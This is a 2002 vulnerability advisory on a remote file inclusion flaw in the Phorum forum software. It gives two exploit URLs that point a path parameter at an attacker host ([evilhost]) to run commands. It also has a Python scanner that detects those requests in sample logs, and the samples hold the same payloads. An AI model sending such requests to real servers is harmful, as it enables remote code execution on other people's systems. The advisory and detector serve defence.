Phorum Remote Command Execution Vulnerability

by Nikola Strahija on May 19th, 2002

A vulnerability has been reported in Phorum that allows remote attackers to specify external PHP scripts and potentially execute commands. The vulnerability exists in the 'plugin.php', 'admin.php' and 'del.php' files found in the Phorum distribution. A malicious attacker can set the location held in a parameter of the vulnerable PHP files by passing it as an argument in the URL.


Phorum is a PHP based web forums package designed for most UNIX variants, Linux, and Microsoft Windows operating systems.

Remote: Yes

Exploit: The following examples were submitted:

http://[target]/phorum/plugin/replace/plugin.php?PHORUM[settings_dir]=http://[evilhost]&cmd=ls

http://[vulnerablehost]/phorum/admin/actions/del.php?include_path=http://[evilhost]&cmd=ls
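
For log review, the request pattern in the examples above can be matched directly. The following is an added example, not part of the original advisory: it flags requests to the three named scripts in which `PHORUM[settings_dir]` or `include_path` is set to a value carrying a URL scheme. The combined access-log format is an assumption, and the log lines, addresses and host names are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qsl

VULN_SCRIPTS = {"plugin.php", "admin.php", "del.php"}   # files named in the advisory
PATH_PARAMS = {"phorum[settings_dir]", "include_path"}  # parameters in the submitted examples
HAS_SCHEME = re.compile(r"^\s*[a-z][a-z0-9+.\-]*://", re.I)  # value points at a remote location
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')  # assumed combined log format


def suspicious_params(request_target):
    """Return [(param, value)] where a path parameter is set to a URL."""
    parts = urlsplit(request_target)
    script = parts.path.rsplit("/", 1)[-1].lower()
    if script not in VULN_SCRIPTS:  # exact file name, so "model.php" is not matched
        return []
    hits = []
    # parse_qsl percent-decodes, so %5B...%5D and %3A%2F%2F forms are caught too.
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        if name.lower() in PATH_PARAMS and HAS_SCHEME.match(value):
            hits.append((name, value))
    return hits


def scan(log_lines):
    """Return [(line_number, param, value)] for every flagged request."""
    findings = []
    for number, line in enumerate(log_lines, 1):
        match = REQUEST.search(line)
        if match:
            for name, value in suspicious_params(match.group(1)):
                findings.append((number, name, value))
    return findings


# Constructed sample lines; addresses and host names are documentation values.
SAMPLE_LOG = [
    '192.0.2.10 - - [19/May/2002:10:00:01 +0000] "GET /phorum/list.php?f=1 HTTP/1.0" 200 5120',
    '192.0.2.77 - - [19/May/2002:10:02:13 +0000] "GET /phorum/plugin/replace/plugin.php'
    '?PHORUM[settings_dir]=http://evil.example&cmd=ls HTTP/1.0" 200 312',
    '192.0.2.77 - - [19/May/2002:10:02:40 +0000] "GET /phorum/admin/actions/del.php'
    '?include_path=http%3A%2F%2Fevil.example&cmd=ls HTTP/1.0" 200 298',
    '192.0.2.10 - - [19/May/2002:10:05:00 +0000] "GET /phorum/admin/actions/del.php'
    '?include_path=./include HTTP/1.0" 200 1024',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

A hit only shows that the request was made; whether the include succeeded depends on the installed Phorum version and the server's PHP configuration.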



